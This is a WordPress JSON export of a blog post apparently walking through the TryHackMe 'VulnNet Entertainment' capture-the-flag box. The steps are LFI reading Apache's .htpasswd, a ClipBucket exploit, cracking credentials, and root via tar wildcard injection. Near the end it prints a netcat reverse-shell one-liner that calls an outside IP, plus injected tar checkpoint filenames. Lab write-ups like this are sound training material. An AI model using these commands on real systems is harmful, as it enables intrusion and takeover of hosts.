{"id":501,"date":"2026-01-13T09:34:44","date_gmt":"2026-01-13T09:34:44","guid":{"rendered":"https:\/\/hackingwithj.com\/?p=501"},"modified":"2026-01-06T09:36:13","modified_gmt":"2026-01-06T09:36:13","slug":"thm-vulnnet-entertainment","status":"publish","type":"post","link":"https:\/\/hackingwithj.com\/?p=501","title":{"rendered":"THM: VulnNet Entertainment"},"content":{"rendered":"\n<p>New year, new room. Time to get back into the rhythm with <strong>VulnNet Entertainment<\/strong>, a solid medium-difficulty TryHackMe box that combines web exploitation, patience, and a privilege escalation technique I hadn\u2019t abused before.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">NMAP<\/h2>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-9d5b1107364c037d862b5209a61454ab\"><code>PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 ea:c9:e8:67:76:0a:3f:97:09:a7:d7:a6:63:ad:c1:2c (RSA)\n|   256 0f:c8:f6:d3:8e:4c:ea:67:47:68:84:dc:1c:2b:2e:34 (ECDSA)\n|_  256 05:53:99:fc:98:10:b5:c3:68:00:6c:29:41:da:a5:c9 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-favicon: Unknown favicon MD5: 8B7969B10EDA5D739468F4D3F2296496\n|_http-title: VulnNet\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\n\n\n<p>Nothing exotic here: SSH and a web server. That immediately tells me this box will likely revolve around <strong>web exploitation leading to SSH or local privilege escalation<\/strong>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">HTTP (80)<\/h2>\n\n\n\n<p>The main website was very basic \u2014 no obvious functionality, no interesting forms:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"348\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-1024x348.png\" alt=\"\" class=\"wp-image-502\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-1024x348.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-300x102.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-768x261.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-1536x522.png 1536w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image.png 1907w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Directory &amp; content discovery<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Gobuster<\/strong> \u2192 nothing useful<\/li>\n\n\n\n<li><strong>ffuf<\/strong> \u2192 found a subdomain: <code>broadcast.vulnnet.thm<\/code><\/li>\n<\/ul>\n\n\n\n<p>This returned a <strong>401 Unauthorized<\/strong>, and browsing to it revealed a login page. At this point I had:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A login page<\/li>\n\n\n\n<li>No confirmed usernames<\/li>\n\n\n\n<li>No obvious functionality to abuse<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\"><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Initial testing &amp; dead ends<\/h3>\n\n\n\n<p>I briefly considered brute-forcing the login on the <code>broadcast<\/code> subdomain using Hydra, but once I saw how slow it would be \u2014 and with no confidence in the username \u2014 I decided not to tunnel-vision on it.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"180\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/imagde-1024x180.png\" alt=\"\" class=\"wp-image-503\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/imagde-1024x180.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/imagde-300x53.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/imagde-768x135.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/imagde.png 1250w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>I also:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Tried a few basic SQLi payloads \u2192 no result<\/li>\n\n\n\n<li>Checked default credentials \u2192 no luck<\/li>\n<\/ul>\n\n\n\n<p>Time to step back and look deeper.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Finding the entry point<\/h2>\n\n\n\n<p>Digging further into the <strong>JavaScript and page behavior<\/strong>, one thing stood out: a <strong>parameter<\/strong> on the main page that looked user-controlled.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"313\" height=\"31\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-1.png\" alt=\"\" class=\"wp-image-504\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-1.png 313w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-1-300x30.png 300w\" sizes=\"auto, (max-width: 313px) 100vw, 313px\" \/><\/figure>\n\n\n\n<p>I fired up <strong>Burp<\/strong>, intercepted the request, and started replaying it. After some trial and error, it became clear: <strong>Local File Inclusion (LFI)<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"513\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-2-1024x513.png\" alt=\"\" class=\"wp-image-505\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-2-1024x513.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-2-300x150.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-2-768x385.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-2.png 1536w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>At first, this didn\u2019t immediately give me anything useful. Reading files like:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>index.php<\/code><\/li>\n\n\n\n<li><code>signup.php<\/code><\/li>\n<\/ul>\n\n\n\n<p>didn\u2019t reveal credentials, but it <em>did<\/em> tell me something important:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>The application is running <strong>ClipBucket 4.0<\/strong><\/p>\n<\/blockquote>\n\n\n\n<p>A quick lookup showed known vulnerabilities, including one listed on Exploit-DB:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/www.exploit-db.com\/exploits\/44250\">https:\/\/www.exploit-db.com\/exploits\/44250<\/a><\/li>\n<\/ul>\n\n\n\n<p>However, I couldn\u2019t directly reach the vulnerable functionality yet. Back to thinking like the system. Apache often stores HTTP authentication credentials in predictable locations. One common file stood out: <code>\/etc\/apache2\/.htpasswd<\/code> Including this file via LFI worked \u2014 and it contained a <strong>password hash<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"529\" height=\"110\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-3.png\" alt=\"\" class=\"wp-image-506\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-3.png 529w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-3-300x62.png 300w\" sizes=\"auto, (max-width: 529px) 100vw, 529px\" \/><\/figure>\n\n\n\n<p>Cracking it with <strong>John the Ripper<\/strong> finally gave me valid credentials. <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"822\" height=\"199\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-4.png\" alt=\"\" class=\"wp-image-507\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-4.png 822w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-4-300x73.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-4-768x186.png 768w\" sizes=\"auto, (max-width: 822px) 100vw, 822px\" \/><\/figure>\n\n\n\n<p>At last: authenticated access.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"211\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-5-1024x211.png\" alt=\"\" class=\"wp-image-508\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-5-1024x211.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-5-300x62.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-5-768x158.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-5-1536x316.png 1536w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-5.png 1913w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Exploitation<\/h2>\n\n\n\n<p>With valid credentials, I revisited the ClipBucket exploit.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>There is a <strong>Metasploit module<\/strong> available:<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"475\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-7-1024x475.png\" alt=\"\" class=\"wp-image-510\" style=\"aspect-ratio:2.155848416908186;width:667px;height:auto\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-7-1024x475.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-7-300x139.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-7-768x356.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-7.png 1267w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>There are also <strong>community Python scripts<\/strong> on GitHub:<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"428\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-6-1024x428.png\" alt=\"\" class=\"wp-image-509\" style=\"aspect-ratio:2.3926313888387214;width:676px;height:auto\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-6-1024x428.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-6-300x125.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-6-768x321.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-6-1536x642.png 1536w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-6.png 1546w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>I chose to go <strong>manual first<\/strong> to understand what was happening. At first, nothing worked \u2014 until I realized I had <strong>mistyped the password<\/strong>.<br>Once corrected, the exploit succeeded and I landed a shell.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"464\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-8-1024x464.png\" alt=\"\" class=\"wp-image-511\" style=\"width:736px;height:auto\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-8-1024x464.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-8-300x136.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-8-768x348.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-8.png 1523w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Lesson learned (again):<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>Sometimes it\u2019s not the exploit \u2014 it\u2019s you.<\/p>\n<\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">Post-exploitation &amp; Enumeration<\/h2>\n\n\n\n<p>After stabilizing the shell, I confirmed I was running as: <code>www-data<\/code> Very restricted \u2014 so enumeration was key. I ran <strong>LinPEAS<\/strong>, which highlighted something interesting:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A readable <strong>SSH backup file<\/strong> belonging to the user <code>server-management<\/code><\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"797\" height=\"384\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-10.png\" alt=\"\" class=\"wp-image-513\" style=\"width:697px;height:auto\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-10.png 797w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-10-300x145.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-10-768x370.png 768w\" sizes=\"auto, (max-width: 797px) 100vw, 797px\" \/><\/figure>\n\n\n\n<p>Cracking that backup gave me valid SSH credentials.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"964\" height=\"666\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-11.png\" alt=\"\" class=\"wp-image-514\" style=\"width:705px;height:auto\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-11.png 964w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-11-300x207.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-11-768x531.png 768w\" sizes=\"auto, (max-width: 964px) 100vw, 964px\" \/><\/figure>\n\n\n\n<p>Now we have:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A real user<\/li>\n\n\n\n<li>A stable SSH session<\/li>\n<\/ul>\n\n\n\n<p>Time to go for root.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Privilege Escalation<\/h2>\n\n\n\n<p>LinPEAS had earlier flagged a backup script in:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"382\" height=\"28\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-9.png\" alt=\"\" class=\"wp-image-512\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-9.png 382w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-9-300x22.png 300w\" sizes=\"auto, (max-width: 382px) 100vw, 382px\" \/><\/figure>\n\n\n\n<p>The script looked harmless at first:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-743ee51d9e18c87586affcc9a8af908d\"><code>#!\/bin\/bash\n\n# Where to backup to.\ndest=\"\/var\/backups\"\n\n# What to backup. \ncd \/home\/server-management\/Documents\nbackup_files=\"*\"\n\n# Create archive filename.\nday=$(date +%A)\nhostname=$(hostname -s)\narchive_file=\"$hostname-$day.tgz\"\n\n# Print start status message.\necho \"Backing up $backup_files to $dest\/$archive_file\"\ndate\necho\n\n# Backup the files using tar.\ntar czf $dest\/$archive_file $backup_files\n\n# Print end status message.\necho\necho \"Backup finished\"\ndate\n\n# Long listing of files in $dest to check file sizes.\nls -lh $dest\n<\/code><\/pre>\n\n\n\n<p>But this is where it gets interesting.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Tar wildcard injection<\/h3>\n\n\n\n<p>Because <code>*<\/code> is used, <strong>any file starting with <code>--<\/code><\/strong> will be interpreted by <code>tar<\/code> as a command-line option. That means we can inject arguments. I created:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A reverse shell script<\/li>\n\n\n\n<li>Specially named files to trigger tar\u2019s checkpoint execution<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-8c1c466fd11b477093a15509c2ec8591\"><code>echo \"rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&amp;1|nc 192.168.136.183 4444 >\/tmp\/f\" > \/home\/server-management\/Documents\/shell.sh\ntouch \"\/home\/server-management\/Documents\/--checkpoint=1\"\ntouch \"\/home\/server-management\/Documents\/--checkpoint-action=exec=\/bin\/sh shell.sh\"<\/code><\/pre>\n\n\n\n<p>With a listener running, the backup script did the rest. Root shell achieved:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"528\" height=\"137\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-12.png\" alt=\"\" class=\"wp-image-515\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-12.png 528w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-12-300x78.png 300w\" sizes=\"auto, (max-width: 528px) 100vw, 528px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Learning notes<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>LFI is often a <strong>stepping stone<\/strong>, not the final exploit<\/li>\n\n\n\n<li>When stuck, think like the <strong>underlying service<\/strong> (Apache in this case)<\/li>\n\n\n\n<li>Tar wildcard injection is powerful and easy to miss<\/li>\n\n\n\n<li>Enumeration matters more than rushing exploits<\/li>\n\n\n\n<li>Small mistakes (like a typo) can cost a lot of time<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>New year, new room. Time to get back into the rhythm with VulnNet Entertainment, a solid medium-difficulty TryHackMe box that combines web exploitation, patience, and a privilege escalation technique I hadn\u2019t abused before. NMAP Nothing exotic here: SSH and a web server. That immediately tells me this box will likely revolve around web exploitation leading [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[8],"tags":[40,29,19,30],"class_list":["post-501","post","type-post","status-publish","format-standard","hentry","category-ctf","tag-ffuf","tag-hydra","tag-lfi","tag-nmap"],"_links":{"self":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/501","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=501"}],"version-history":[{"count":7,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/501\/revisions"}],"predecessor-version":[{"id":517,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/501\/revisions\/517"}],"wp:attachment":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=501"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=501"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=501"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}